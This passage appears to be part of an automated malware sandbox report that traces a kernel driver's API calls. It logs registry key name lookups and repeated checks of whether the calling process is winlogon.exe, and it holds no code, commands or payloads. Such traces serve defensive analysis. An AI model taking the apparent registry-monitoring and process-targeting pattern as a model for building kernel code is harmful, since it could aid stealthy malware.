| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11c, ret_val_ptr_out = 0xffffe0003a7879d0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x11c, ObjectNameInfo_unk_out = 0xffffe0003a7879d0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7879d0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769db0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11e, ret_val_ptr_out = 0xffffe0003a769db0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11c, ret_val_ptr_out = 0xffffe0003a7879d0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x11c, ObjectNameInfo_unk_out = 0xffffe0003a7879d0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7879d0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769db0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11e, ret_val_ptr_out = 0xffffe0003a769db0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11c, ret_val_ptr_out = 0xffffe0003a7879d0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x11c, ObjectNameInfo_unk_out = 0xffffe0003a7879d0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7879d0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769db0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11e, ret_val_ptr_out = 0xffffe0003a769db0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11c, ret_val_ptr_out = 0xffffe0003a7879d0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x11c, ObjectNameInfo_unk_out = 0xffffe0003a7879d0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7879d0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769db0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11e, ret_val_ptr_out = 0xffffe0003a769db0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11c, ret_val_ptr_out = 0xffffe0003a7879d0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x11c, ObjectNameInfo_unk_out = 0xffffe0003a7879d0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7879d0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769db0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11e, ret_val_ptr_out = 0xffffe0003a769db0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11c, ret_val_ptr_out = 0xffffe0003a7879d0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x11c, ObjectNameInfo_unk_out = 0xffffe0003a7879d0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7879d0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769db0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11e, ret_val_ptr_out = 0xffffe0003a769db0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11c, ret_val_ptr_out = 0xffffe0003a7879d0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x11c, ObjectNameInfo_unk_out = 0xffffe0003a7879d0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7879d0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769db0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11e, ret_val_ptr_out = 0xffffe0003a769db0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11c, ret_val_ptr_out = 0xffffe0003a7879d0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x11c, ObjectNameInfo_unk_out = 0xffffe0003a7879d0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7879d0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769db0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11e, ret_val_ptr_out = 0xffffe0003a769db0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11c, ret_val_ptr_out = 0xffffe0003a7879d0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x11c, ObjectNameInfo_unk_out = 0xffffe0003a7879d0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7879d0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769db0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11e, ret_val_ptr_out = 0xffffe0003a769db0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11c, ret_val_ptr_out = 0xffffe0003a7879d0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x11c, ObjectNameInfo_unk_out = 0xffffe0003a7879d0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7879d0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769db0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
|
For performance reasons, the remaining entries are omitted.
Click to download all entries as text file. |
|||||
Execution Path #99 (length: 58, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 58 |
Processes
»
| Process | Count |
|---|---|
| Process 11 (svchost.exe, PID: 324) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| ObQueryNameString | Object_ptr = 0xffffc000b90ded40, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ae4efb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, ret_val_ptr_out = 0xffffe0003c6341c0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90ded40, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b90ded40, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ae4ec98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x78, ret_val_ptr_out = 0xffffe0003a763520 |
| ObQueryNameString | Object_ptr = 0xffffc000b90ded40, Length = 0x78, ObjectNameInfo_unk_out = 0xffffe0003a763520, ReturnLength_ptr_out = 0xffffd0002ae4ec98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Cpv, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Cpv |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763520, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4a6080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4a64d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4a6080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4a64d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4a6080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4a64d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4a6080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4a64d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4a6080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4a64d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4a6080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4a64d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4a6080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4a64d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4a6080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4a64d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4a6080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4a64d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4a6080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4a64d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4a6080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4a64d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4a6080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4a64d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4a6080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4a64d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4a6080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4a64d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4a6080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4a64d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4a6080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4a64d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
Execution Path #35 (length: 17, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 17 |
Processes
»
| Process | Count |
|---|---|
| Process 28 (sihost.exe, PID: 1432) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf6f840 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf6fc90 |
| _stricmp | _Str1 = sihost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf6f840 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf6fc90 |
| _stricmp | _Str1 = sihost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f25afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xec, ret_val_ptr_out = 0xffffe0003a763f10 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 |
